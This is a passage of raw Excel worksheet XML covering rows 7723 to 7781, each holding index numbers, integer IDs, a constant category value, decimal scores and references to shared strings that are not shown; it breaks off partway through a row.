    <row r="7723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7723" s="1">
        <v>7721</v>
      </c>
      <c r="B7723">
        <v>1954</v>
      </c>
      <c r="C7723">
        <v>1954</v>
      </c>
      <c r="D7723">
        <v>4</v>
      </c>
      <c r="E7723">
        <v>0.97869998216629028</v>
      </c>
      <c r="F7723" t="s">
        <v>13461</v>
      </c>
      <c r="G7723" t="s">
        <v>15276</v>
      </c>
      <c r="H7723" t="s">
        <v>15277</v>
      </c>
    </row>
    <row r="7724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7724" s="1">
        <v>7722</v>
      </c>
      <c r="B7724">
        <v>7060</v>
      </c>
      <c r="C7724">
        <v>7060</v>
      </c>
      <c r="D7724">
        <v>4</v>
      </c>
      <c r="E7724">
        <v>0.66399997472763062</v>
      </c>
      <c r="F7724" t="s">
        <v>13461</v>
      </c>
      <c r="G7724" t="s">
        <v>15278</v>
      </c>
      <c r="H7724" t="s">
        <v>15279</v>
      </c>
    </row>
    <row r="7725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7725" s="1">
        <v>7723</v>
      </c>
      <c r="B7725">
        <v>1956</v>
      </c>
      <c r="C7725">
        <v>1956</v>
      </c>
      <c r="D7725">
        <v>4</v>
      </c>
      <c r="E7725">
        <v>0.66289997100830078</v>
      </c>
      <c r="F7725" t="s">
        <v>13461</v>
      </c>
      <c r="G7725" t="s">
        <v>15280</v>
      </c>
      <c r="H7725" t="s">
        <v>15281</v>
      </c>
    </row>
    <row r="7726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7726" s="1">
        <v>7724</v>
      </c>
      <c r="B7726">
        <v>1969</v>
      </c>
      <c r="C7726">
        <v>1969</v>
      </c>
      <c r="D7726">
        <v>4</v>
      </c>
      <c r="E7726">
        <v>0.98710000514984131</v>
      </c>
      <c r="F7726" t="s">
        <v>13461</v>
      </c>
      <c r="G7726" t="s">
        <v>15282</v>
      </c>
      <c r="H7726" t="s">
        <v>15283</v>
      </c>
    </row>
    <row r="7727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7727" s="1">
        <v>7725</v>
      </c>
      <c r="B7727">
        <v>1979</v>
      </c>
      <c r="C7727">
        <v>1979</v>
      </c>
      <c r="D7727">
        <v>4</v>
      </c>
      <c r="E7727">
        <v>0.5810999870300293</v>
      </c>
      <c r="F7727" t="s">
        <v>13461</v>
      </c>
      <c r="G7727" t="s">
        <v>15284</v>
      </c>
      <c r="H7727" t="s">
        <v>15285</v>
      </c>
    </row>
    <row r="7728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7728" s="1">
        <v>7726</v>
      </c>
      <c r="B7728">
        <v>2030</v>
      </c>
      <c r="C7728">
        <v>2030</v>
      </c>
      <c r="D7728">
        <v>4</v>
      </c>
      <c r="E7728">
        <v>0.26629999279975891</v>
      </c>
      <c r="F7728" t="s">
        <v>13461</v>
      </c>
      <c r="G7728" t="s">
        <v>15286</v>
      </c>
      <c r="H7728" t="s">
        <v>15287</v>
      </c>
    </row>
    <row r="7729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7729" s="1">
        <v>7727</v>
      </c>
      <c r="B7729">
        <v>7051</v>
      </c>
      <c r="C7729">
        <v>7051</v>
      </c>
      <c r="D7729">
        <v>4</v>
      </c>
      <c r="E7729">
        <v>0.41139999032020569</v>
      </c>
      <c r="F7729" t="s">
        <v>13461</v>
      </c>
      <c r="G7729" t="s">
        <v>15288</v>
      </c>
      <c r="H7729" t="s">
        <v>15289</v>
      </c>
    </row>
    <row r="7730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7730" s="1">
        <v>7728</v>
      </c>
      <c r="B7730">
        <v>1987</v>
      </c>
      <c r="C7730">
        <v>1987</v>
      </c>
      <c r="D7730">
        <v>4</v>
      </c>
      <c r="E7730">
        <v>0.53280001878738403</v>
      </c>
      <c r="F7730" t="s">
        <v>13461</v>
      </c>
      <c r="G7730" t="s">
        <v>15290</v>
      </c>
      <c r="H7730" t="s">
        <v>15291</v>
      </c>
    </row>
    <row r="7731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7731" s="1">
        <v>7729</v>
      </c>
      <c r="B7731">
        <v>7046</v>
      </c>
      <c r="C7731">
        <v>7046</v>
      </c>
      <c r="D7731">
        <v>4</v>
      </c>
      <c r="E7731">
        <v>0.97649997472763062</v>
      </c>
      <c r="F7731" t="s">
        <v>13461</v>
      </c>
      <c r="G7731" t="s">
        <v>15292</v>
      </c>
      <c r="H7731" t="s">
        <v>15293</v>
      </c>
    </row>
    <row r="7732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7732" s="1">
        <v>7730</v>
      </c>
      <c r="B7732">
        <v>7045</v>
      </c>
      <c r="C7732">
        <v>7045</v>
      </c>
      <c r="D7732">
        <v>4</v>
      </c>
      <c r="E7732">
        <v>0.4122999906539917</v>
      </c>
      <c r="F7732" t="s">
        <v>13461</v>
      </c>
      <c r="G7732" t="s">
        <v>15294</v>
      </c>
      <c r="H7732" t="s">
        <v>15295</v>
      </c>
    </row>
    <row r="7733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7733" s="1">
        <v>7731</v>
      </c>
      <c r="B7733">
        <v>1992</v>
      </c>
      <c r="C7733">
        <v>1992</v>
      </c>
      <c r="D7733">
        <v>4</v>
      </c>
      <c r="E7733">
        <v>0.63690000772476196</v>
      </c>
      <c r="F7733" t="s">
        <v>13461</v>
      </c>
      <c r="G7733" t="s">
        <v>15296</v>
      </c>
      <c r="H7733" t="s">
        <v>15297</v>
      </c>
    </row>
    <row r="7734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7734" s="1">
        <v>7732</v>
      </c>
      <c r="B7734">
        <v>2003</v>
      </c>
      <c r="C7734">
        <v>2003</v>
      </c>
      <c r="D7734">
        <v>4</v>
      </c>
      <c r="E7734">
        <v>0.59350001811981201</v>
      </c>
      <c r="F7734" t="s">
        <v>13461</v>
      </c>
      <c r="G7734" t="s">
        <v>15298</v>
      </c>
      <c r="H7734" t="s">
        <v>15299</v>
      </c>
    </row>
    <row r="7735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7735" s="1">
        <v>7733</v>
      </c>
      <c r="B7735">
        <v>2005</v>
      </c>
      <c r="C7735">
        <v>2005</v>
      </c>
      <c r="D7735">
        <v>4</v>
      </c>
      <c r="E7735">
        <v>0.51740002632141113</v>
      </c>
      <c r="F7735" t="s">
        <v>13461</v>
      </c>
      <c r="G7735" t="s">
        <v>15300</v>
      </c>
      <c r="H7735" t="s">
        <v>15301</v>
      </c>
    </row>
    <row r="7736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7736" s="1">
        <v>7734</v>
      </c>
      <c r="B7736">
        <v>2018</v>
      </c>
      <c r="C7736">
        <v>2018</v>
      </c>
      <c r="D7736">
        <v>4</v>
      </c>
      <c r="E7736">
        <v>0.50679999589920044</v>
      </c>
      <c r="F7736" t="s">
        <v>13461</v>
      </c>
      <c r="G7736" t="s">
        <v>15302</v>
      </c>
      <c r="H7736" t="s">
        <v>15303</v>
      </c>
    </row>
    <row r="7737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7737" s="1">
        <v>7735</v>
      </c>
      <c r="B7737">
        <v>2019</v>
      </c>
      <c r="C7737">
        <v>2019</v>
      </c>
      <c r="D7737">
        <v>4</v>
      </c>
      <c r="E7737">
        <v>0.84210002422332764</v>
      </c>
      <c r="F7737" t="s">
        <v>13461</v>
      </c>
      <c r="G7737" t="s">
        <v>15304</v>
      </c>
      <c r="H7737" t="s">
        <v>15305</v>
      </c>
    </row>
    <row r="7738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7738" s="1">
        <v>7736</v>
      </c>
      <c r="B7738">
        <v>2021</v>
      </c>
      <c r="C7738">
        <v>2021</v>
      </c>
      <c r="D7738">
        <v>4</v>
      </c>
      <c r="E7738">
        <v>0.65719997882843018</v>
      </c>
      <c r="F7738" t="s">
        <v>13461</v>
      </c>
      <c r="G7738" t="s">
        <v>15306</v>
      </c>
      <c r="H7738" t="s">
        <v>15307</v>
      </c>
    </row>
    <row r="7739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7739" s="1">
        <v>7737</v>
      </c>
      <c r="B7739">
        <v>1986</v>
      </c>
      <c r="C7739">
        <v>1986</v>
      </c>
      <c r="D7739">
        <v>4</v>
      </c>
      <c r="E7739">
        <v>0.98580002784729004</v>
      </c>
      <c r="F7739" t="s">
        <v>13461</v>
      </c>
      <c r="G7739" t="s">
        <v>15308</v>
      </c>
      <c r="H7739" t="s">
        <v>15309</v>
      </c>
    </row>
    <row r="7740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7740" s="1">
        <v>7738</v>
      </c>
      <c r="B7740">
        <v>2461</v>
      </c>
      <c r="C7740">
        <v>2461</v>
      </c>
      <c r="D7740">
        <v>4</v>
      </c>
      <c r="E7740">
        <v>0.68629997968673706</v>
      </c>
      <c r="F7740" t="s">
        <v>13461</v>
      </c>
      <c r="G7740" t="s">
        <v>15310</v>
      </c>
      <c r="H7740" t="s">
        <v>15311</v>
      </c>
    </row>
    <row r="7741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7741" s="1">
        <v>7739</v>
      </c>
      <c r="B7741">
        <v>2466</v>
      </c>
      <c r="C7741">
        <v>2466</v>
      </c>
      <c r="D7741">
        <v>4</v>
      </c>
      <c r="E7741">
        <v>0.7720000147819519</v>
      </c>
      <c r="F7741" t="s">
        <v>13461</v>
      </c>
      <c r="G7741" t="s">
        <v>15312</v>
      </c>
      <c r="H7741" t="s">
        <v>15313</v>
      </c>
    </row>
    <row r="7742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7742" s="1">
        <v>7740</v>
      </c>
      <c r="B7742">
        <v>6813</v>
      </c>
      <c r="C7742">
        <v>6813</v>
      </c>
      <c r="D7742">
        <v>4</v>
      </c>
      <c r="E7742">
        <v>0.87790000438690186</v>
      </c>
      <c r="F7742" t="s">
        <v>13461</v>
      </c>
      <c r="G7742" t="s">
        <v>15314</v>
      </c>
      <c r="H7742" t="s">
        <v>15315</v>
      </c>
    </row>
    <row r="7743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7743" s="1">
        <v>7741</v>
      </c>
      <c r="B7743">
        <v>3079</v>
      </c>
      <c r="C7743">
        <v>3079</v>
      </c>
      <c r="D7743">
        <v>4</v>
      </c>
      <c r="E7743">
        <v>0.79680001735687256</v>
      </c>
      <c r="F7743" t="s">
        <v>13461</v>
      </c>
      <c r="G7743" t="s">
        <v>15316</v>
      </c>
      <c r="H7743" t="s">
        <v>15317</v>
      </c>
    </row>
    <row r="7744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7744" s="1">
        <v>7742</v>
      </c>
      <c r="B7744">
        <v>3081</v>
      </c>
      <c r="C7744">
        <v>3081</v>
      </c>
      <c r="D7744">
        <v>4</v>
      </c>
      <c r="E7744">
        <v>0.53390002250671387</v>
      </c>
      <c r="F7744" t="s">
        <v>13461</v>
      </c>
      <c r="G7744" t="s">
        <v>15318</v>
      </c>
      <c r="H7744" t="s">
        <v>15319</v>
      </c>
    </row>
    <row r="7745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7745" s="1">
        <v>7743</v>
      </c>
      <c r="B7745">
        <v>3123</v>
      </c>
      <c r="C7745">
        <v>3123</v>
      </c>
      <c r="D7745">
        <v>4</v>
      </c>
      <c r="E7745">
        <v>0.6600000262260437</v>
      </c>
      <c r="F7745" t="s">
        <v>13461</v>
      </c>
      <c r="G7745" t="s">
        <v>15320</v>
      </c>
      <c r="H7745" t="s">
        <v>15321</v>
      </c>
    </row>
    <row r="7746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7746" s="1">
        <v>7744</v>
      </c>
      <c r="B7746">
        <v>3138</v>
      </c>
      <c r="C7746">
        <v>3138</v>
      </c>
      <c r="D7746">
        <v>4</v>
      </c>
      <c r="E7746">
        <v>0.78339999914169312</v>
      </c>
      <c r="F7746" t="s">
        <v>13461</v>
      </c>
      <c r="G7746" t="s">
        <v>15322</v>
      </c>
      <c r="H7746" t="s">
        <v>15323</v>
      </c>
    </row>
    <row r="7747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7747" s="1">
        <v>7745</v>
      </c>
      <c r="B7747">
        <v>3140</v>
      </c>
      <c r="C7747">
        <v>3140</v>
      </c>
      <c r="D7747">
        <v>4</v>
      </c>
      <c r="E7747">
        <v>0.6226000189781189</v>
      </c>
      <c r="F7747" t="s">
        <v>13461</v>
      </c>
      <c r="G7747" t="s">
        <v>15324</v>
      </c>
      <c r="H7747" t="s">
        <v>15325</v>
      </c>
    </row>
    <row r="7748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7748" s="1">
        <v>7746</v>
      </c>
      <c r="B7748">
        <v>3142</v>
      </c>
      <c r="C7748">
        <v>3142</v>
      </c>
      <c r="D7748">
        <v>4</v>
      </c>
      <c r="E7748">
        <v>0.99790000915527344</v>
      </c>
      <c r="F7748" t="s">
        <v>13461</v>
      </c>
      <c r="G7748" t="s">
        <v>15326</v>
      </c>
      <c r="H7748" t="s">
        <v>15327</v>
      </c>
    </row>
    <row r="7749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7749" s="1">
        <v>7747</v>
      </c>
      <c r="B7749">
        <v>3165</v>
      </c>
      <c r="C7749">
        <v>3165</v>
      </c>
      <c r="D7749">
        <v>4</v>
      </c>
      <c r="E7749">
        <v>0.51249998807907104</v>
      </c>
      <c r="F7749" t="s">
        <v>13461</v>
      </c>
      <c r="G7749" t="s">
        <v>15328</v>
      </c>
      <c r="H7749" t="s">
        <v>15329</v>
      </c>
    </row>
    <row r="7750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7750" s="1">
        <v>7748</v>
      </c>
      <c r="B7750">
        <v>6532</v>
      </c>
      <c r="C7750">
        <v>6532</v>
      </c>
      <c r="D7750">
        <v>4</v>
      </c>
      <c r="E7750">
        <v>0.8773999810218811</v>
      </c>
      <c r="F7750" t="s">
        <v>13461</v>
      </c>
      <c r="G7750" t="s">
        <v>15330</v>
      </c>
      <c r="H7750" t="s">
        <v>15331</v>
      </c>
    </row>
    <row r="7751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7751" s="1">
        <v>7749</v>
      </c>
      <c r="B7751">
        <v>3175</v>
      </c>
      <c r="C7751">
        <v>3175</v>
      </c>
      <c r="D7751">
        <v>4</v>
      </c>
      <c r="E7751">
        <v>0.67140001058578491</v>
      </c>
      <c r="F7751" t="s">
        <v>13461</v>
      </c>
      <c r="G7751" t="s">
        <v>15332</v>
      </c>
      <c r="H7751" t="s">
        <v>15333</v>
      </c>
    </row>
    <row r="7752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7752" s="1">
        <v>7750</v>
      </c>
      <c r="B7752">
        <v>3078</v>
      </c>
      <c r="C7752">
        <v>3078</v>
      </c>
      <c r="D7752">
        <v>4</v>
      </c>
      <c r="E7752">
        <v>0.45159998536109919</v>
      </c>
      <c r="F7752" t="s">
        <v>13461</v>
      </c>
      <c r="G7752" t="s">
        <v>15334</v>
      </c>
      <c r="H7752" t="s">
        <v>15335</v>
      </c>
    </row>
    <row r="7753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7753" s="1">
        <v>7751</v>
      </c>
      <c r="B7753">
        <v>6528</v>
      </c>
      <c r="C7753">
        <v>6528</v>
      </c>
      <c r="D7753">
        <v>4</v>
      </c>
      <c r="E7753">
        <v>0.99800002574920654</v>
      </c>
      <c r="F7753" t="s">
        <v>13461</v>
      </c>
      <c r="G7753" t="s">
        <v>15336</v>
      </c>
      <c r="H7753" t="s">
        <v>15337</v>
      </c>
    </row>
    <row r="7754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7754" s="1">
        <v>7752</v>
      </c>
      <c r="B7754">
        <v>6526</v>
      </c>
      <c r="C7754">
        <v>6526</v>
      </c>
      <c r="D7754">
        <v>4</v>
      </c>
      <c r="E7754">
        <v>0.58079999685287476</v>
      </c>
      <c r="F7754" t="s">
        <v>13461</v>
      </c>
      <c r="G7754" t="s">
        <v>15338</v>
      </c>
      <c r="H7754" t="s">
        <v>15339</v>
      </c>
    </row>
    <row r="7755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7755" s="1">
        <v>7753</v>
      </c>
      <c r="B7755">
        <v>6525</v>
      </c>
      <c r="C7755">
        <v>6525</v>
      </c>
      <c r="D7755">
        <v>4</v>
      </c>
      <c r="E7755">
        <v>0.89469999074935913</v>
      </c>
      <c r="F7755" t="s">
        <v>13461</v>
      </c>
      <c r="G7755" t="s">
        <v>15340</v>
      </c>
      <c r="H7755" t="s">
        <v>15341</v>
      </c>
    </row>
    <row r="7756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7756" s="1">
        <v>7754</v>
      </c>
      <c r="B7756">
        <v>6524</v>
      </c>
      <c r="C7756">
        <v>6524</v>
      </c>
      <c r="D7756">
        <v>4</v>
      </c>
      <c r="E7756">
        <v>0.5437999963760376</v>
      </c>
      <c r="F7756" t="s">
        <v>13461</v>
      </c>
      <c r="G7756" t="s">
        <v>15342</v>
      </c>
      <c r="H7756" t="s">
        <v>15343</v>
      </c>
    </row>
    <row r="7757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7757" s="1">
        <v>7755</v>
      </c>
      <c r="B7757">
        <v>3180</v>
      </c>
      <c r="C7757">
        <v>3180</v>
      </c>
      <c r="D7757">
        <v>4</v>
      </c>
      <c r="E7757">
        <v>0.72780001163482666</v>
      </c>
      <c r="F7757" t="s">
        <v>13461</v>
      </c>
      <c r="G7757" t="s">
        <v>15344</v>
      </c>
      <c r="H7757" t="s">
        <v>15345</v>
      </c>
    </row>
    <row r="7758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7758" s="1">
        <v>7756</v>
      </c>
      <c r="B7758">
        <v>3189</v>
      </c>
      <c r="C7758">
        <v>3189</v>
      </c>
      <c r="D7758">
        <v>4</v>
      </c>
      <c r="E7758">
        <v>0.76150000095367432</v>
      </c>
      <c r="F7758" t="s">
        <v>13461</v>
      </c>
      <c r="G7758" t="s">
        <v>15346</v>
      </c>
      <c r="H7758" t="s">
        <v>15347</v>
      </c>
    </row>
    <row r="7759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7759" s="1">
        <v>7757</v>
      </c>
      <c r="B7759">
        <v>3190</v>
      </c>
      <c r="C7759">
        <v>3190</v>
      </c>
      <c r="D7759">
        <v>4</v>
      </c>
      <c r="E7759">
        <v>0.5932999849319458</v>
      </c>
      <c r="F7759" t="s">
        <v>13461</v>
      </c>
      <c r="G7759" t="s">
        <v>15348</v>
      </c>
      <c r="H7759" t="s">
        <v>15349</v>
      </c>
    </row>
    <row r="7760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7760" s="1">
        <v>7758</v>
      </c>
      <c r="B7760">
        <v>3191</v>
      </c>
      <c r="C7760">
        <v>3191</v>
      </c>
      <c r="D7760">
        <v>4</v>
      </c>
      <c r="E7760">
        <v>0.90319997072219849</v>
      </c>
      <c r="F7760" t="s">
        <v>13461</v>
      </c>
      <c r="G7760" t="s">
        <v>15350</v>
      </c>
      <c r="H7760" t="s">
        <v>15351</v>
      </c>
    </row>
    <row r="7761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7761" s="1">
        <v>7759</v>
      </c>
      <c r="B7761">
        <v>3197</v>
      </c>
      <c r="C7761">
        <v>3197</v>
      </c>
      <c r="D7761">
        <v>4</v>
      </c>
      <c r="E7761">
        <v>0.98549997806549072</v>
      </c>
      <c r="F7761" t="s">
        <v>13461</v>
      </c>
      <c r="G7761" t="s">
        <v>15352</v>
      </c>
      <c r="H7761" t="s">
        <v>15353</v>
      </c>
    </row>
    <row r="7762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7762" s="1">
        <v>7760</v>
      </c>
      <c r="B7762">
        <v>6517</v>
      </c>
      <c r="C7762">
        <v>6517</v>
      </c>
      <c r="D7762">
        <v>4</v>
      </c>
      <c r="E7762">
        <v>0.78259998559951782</v>
      </c>
      <c r="F7762" t="s">
        <v>13461</v>
      </c>
      <c r="G7762" t="s">
        <v>15354</v>
      </c>
      <c r="H7762" t="s">
        <v>15125</v>
      </c>
    </row>
    <row r="7763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7763" s="1">
        <v>7761</v>
      </c>
      <c r="B7763">
        <v>3177</v>
      </c>
      <c r="C7763">
        <v>3177</v>
      </c>
      <c r="D7763">
        <v>4</v>
      </c>
      <c r="E7763">
        <v>0.9966999888420105</v>
      </c>
      <c r="F7763" t="s">
        <v>13461</v>
      </c>
      <c r="G7763" t="s">
        <v>15355</v>
      </c>
      <c r="H7763" t="s">
        <v>15356</v>
      </c>
    </row>
    <row r="7764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7764" s="1">
        <v>7762</v>
      </c>
      <c r="B7764">
        <v>3199</v>
      </c>
      <c r="C7764">
        <v>3199</v>
      </c>
      <c r="D7764">
        <v>4</v>
      </c>
      <c r="E7764">
        <v>0.7750999927520752</v>
      </c>
      <c r="F7764" t="s">
        <v>13461</v>
      </c>
      <c r="G7764" t="s">
        <v>15357</v>
      </c>
      <c r="H7764" t="s">
        <v>15358</v>
      </c>
    </row>
    <row r="7765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7765" s="1">
        <v>7763</v>
      </c>
      <c r="B7765">
        <v>3074</v>
      </c>
      <c r="C7765">
        <v>3074</v>
      </c>
      <c r="D7765">
        <v>4</v>
      </c>
      <c r="E7765">
        <v>0.81739997863769531</v>
      </c>
      <c r="F7765" t="s">
        <v>13461</v>
      </c>
      <c r="G7765" t="s">
        <v>15359</v>
      </c>
      <c r="H7765" t="s">
        <v>15360</v>
      </c>
    </row>
    <row r="7766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7766" s="1">
        <v>7764</v>
      </c>
      <c r="B7766">
        <v>3068</v>
      </c>
      <c r="C7766">
        <v>3068</v>
      </c>
      <c r="D7766">
        <v>4</v>
      </c>
      <c r="E7766">
        <v>0.62870001792907715</v>
      </c>
      <c r="F7766" t="s">
        <v>13461</v>
      </c>
      <c r="G7766" t="s">
        <v>15361</v>
      </c>
      <c r="H7766" t="s">
        <v>15362</v>
      </c>
    </row>
    <row r="7767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7767" s="1">
        <v>7765</v>
      </c>
      <c r="B7767">
        <v>2962</v>
      </c>
      <c r="C7767">
        <v>2962</v>
      </c>
      <c r="D7767">
        <v>4</v>
      </c>
      <c r="E7767">
        <v>0.91949999332427979</v>
      </c>
      <c r="F7767" t="s">
        <v>13461</v>
      </c>
      <c r="G7767" t="s">
        <v>15363</v>
      </c>
      <c r="H7767" t="s">
        <v>15364</v>
      </c>
    </row>
    <row r="7768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7768" s="1">
        <v>7766</v>
      </c>
      <c r="B7768">
        <v>2970</v>
      </c>
      <c r="C7768">
        <v>2970</v>
      </c>
      <c r="D7768">
        <v>4</v>
      </c>
      <c r="E7768">
        <v>0.54629999399185181</v>
      </c>
      <c r="F7768" t="s">
        <v>13461</v>
      </c>
      <c r="G7768" t="s">
        <v>15365</v>
      </c>
      <c r="H7768" t="s">
        <v>15366</v>
      </c>
    </row>
    <row r="7769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7769" s="1">
        <v>7767</v>
      </c>
      <c r="B7769">
        <v>2971</v>
      </c>
      <c r="C7769">
        <v>2971</v>
      </c>
      <c r="D7769">
        <v>4</v>
      </c>
      <c r="E7769">
        <v>0.54820001125335693</v>
      </c>
      <c r="F7769" t="s">
        <v>13461</v>
      </c>
      <c r="G7769" t="s">
        <v>15367</v>
      </c>
      <c r="H7769" t="s">
        <v>15366</v>
      </c>
    </row>
    <row r="7770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7770" s="1">
        <v>7768</v>
      </c>
      <c r="B7770">
        <v>2972</v>
      </c>
      <c r="C7770">
        <v>2972</v>
      </c>
      <c r="D7770">
        <v>4</v>
      </c>
      <c r="E7770">
        <v>0.62269997596740723</v>
      </c>
      <c r="F7770" t="s">
        <v>13461</v>
      </c>
      <c r="G7770" t="s">
        <v>15368</v>
      </c>
      <c r="H7770" t="s">
        <v>15369</v>
      </c>
    </row>
    <row r="7771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7771" s="1">
        <v>7769</v>
      </c>
      <c r="B7771">
        <v>6595</v>
      </c>
      <c r="C7771">
        <v>6595</v>
      </c>
      <c r="D7771">
        <v>4</v>
      </c>
      <c r="E7771">
        <v>0.66360002756118774</v>
      </c>
      <c r="F7771" t="s">
        <v>13461</v>
      </c>
      <c r="G7771" t="s">
        <v>15370</v>
      </c>
      <c r="H7771" t="s">
        <v>15371</v>
      </c>
    </row>
    <row r="7772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7772" s="1">
        <v>7770</v>
      </c>
      <c r="B7772">
        <v>6594</v>
      </c>
      <c r="C7772">
        <v>6594</v>
      </c>
      <c r="D7772">
        <v>4</v>
      </c>
      <c r="E7772">
        <v>0.55769997835159302</v>
      </c>
      <c r="F7772" t="s">
        <v>13461</v>
      </c>
      <c r="G7772" t="s">
        <v>15372</v>
      </c>
      <c r="H7772" t="s">
        <v>15373</v>
      </c>
    </row>
    <row r="7773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7773" s="1">
        <v>7771</v>
      </c>
      <c r="B7773">
        <v>2981</v>
      </c>
      <c r="C7773">
        <v>2981</v>
      </c>
      <c r="D7773">
        <v>4</v>
      </c>
      <c r="E7773">
        <v>0.58319997787475586</v>
      </c>
      <c r="F7773" t="s">
        <v>13461</v>
      </c>
      <c r="G7773" t="s">
        <v>15374</v>
      </c>
      <c r="H7773" t="s">
        <v>15375</v>
      </c>
    </row>
    <row r="7774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7774" s="1">
        <v>7772</v>
      </c>
      <c r="B7774">
        <v>2990</v>
      </c>
      <c r="C7774">
        <v>2990</v>
      </c>
      <c r="D7774">
        <v>4</v>
      </c>
      <c r="E7774">
        <v>0.49210000038146973</v>
      </c>
      <c r="F7774" t="s">
        <v>13461</v>
      </c>
      <c r="G7774" t="s">
        <v>15376</v>
      </c>
      <c r="H7774" t="s">
        <v>15377</v>
      </c>
    </row>
    <row r="7775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7775" s="1">
        <v>7773</v>
      </c>
      <c r="B7775">
        <v>6588</v>
      </c>
      <c r="C7775">
        <v>6588</v>
      </c>
      <c r="D7775">
        <v>4</v>
      </c>
      <c r="E7775">
        <v>0.51249998807907104</v>
      </c>
      <c r="F7775" t="s">
        <v>13461</v>
      </c>
      <c r="G7775" t="s">
        <v>15378</v>
      </c>
      <c r="H7775" t="s">
        <v>15379</v>
      </c>
    </row>
    <row r="7776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7776" s="1">
        <v>7774</v>
      </c>
      <c r="B7776">
        <v>6557</v>
      </c>
      <c r="C7776">
        <v>6557</v>
      </c>
      <c r="D7776">
        <v>4</v>
      </c>
      <c r="E7776">
        <v>0.4205000102519989</v>
      </c>
      <c r="F7776" t="s">
        <v>13461</v>
      </c>
      <c r="G7776" t="s">
        <v>15380</v>
      </c>
      <c r="H7776" t="s">
        <v>15381</v>
      </c>
    </row>
    <row r="7777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7777" s="1">
        <v>7775</v>
      </c>
      <c r="B7777">
        <v>2995</v>
      </c>
      <c r="C7777">
        <v>2995</v>
      </c>
      <c r="D7777">
        <v>4</v>
      </c>
      <c r="E7777">
        <v>0.45640000700950623</v>
      </c>
      <c r="F7777" t="s">
        <v>13461</v>
      </c>
      <c r="G7777" t="s">
        <v>15382</v>
      </c>
      <c r="H7777" t="s">
        <v>15383</v>
      </c>
    </row>
    <row r="7778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7778" s="1">
        <v>7776</v>
      </c>
      <c r="B7778">
        <v>2997</v>
      </c>
      <c r="C7778">
        <v>2997</v>
      </c>
      <c r="D7778">
        <v>4</v>
      </c>
      <c r="E7778">
        <v>0.53880000114440918</v>
      </c>
      <c r="F7778" t="s">
        <v>13461</v>
      </c>
      <c r="G7778" t="s">
        <v>15384</v>
      </c>
      <c r="H7778" t="s">
        <v>15385</v>
      </c>
    </row>
    <row r="7779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7779" s="1">
        <v>7777</v>
      </c>
      <c r="B7779">
        <v>3002</v>
      </c>
      <c r="C7779">
        <v>3002</v>
      </c>
      <c r="D7779">
        <v>4</v>
      </c>
      <c r="E7779">
        <v>0.92750000953674316</v>
      </c>
      <c r="F7779" t="s">
        <v>13461</v>
      </c>
      <c r="G7779" t="s">
        <v>15386</v>
      </c>
      <c r="H7779" t="s">
        <v>15387</v>
      </c>
    </row>
    <row r="7780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7780" s="1">
        <v>7778</v>
      </c>
      <c r="B7780">
        <v>3006</v>
      </c>
      <c r="C7780">
        <v>3006</v>
      </c>
      <c r="D7780">
        <v>4</v>
      </c>
      <c r="E7780">
        <v>0.99659997224807739</v>
      </c>
      <c r="F7780" t="s">
        <v>13461</v>
      </c>
      <c r="G7780" t="s">
        <v>15388</v>
      </c>
      <c r="H7780" t="s">
        <v>15389</v>
      </c>
    </row>
    <row r="7781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7781" s="1">
        <v>7779</v>
      </c>
      <c r="B7781">
        <v>3010</v>
      </c>
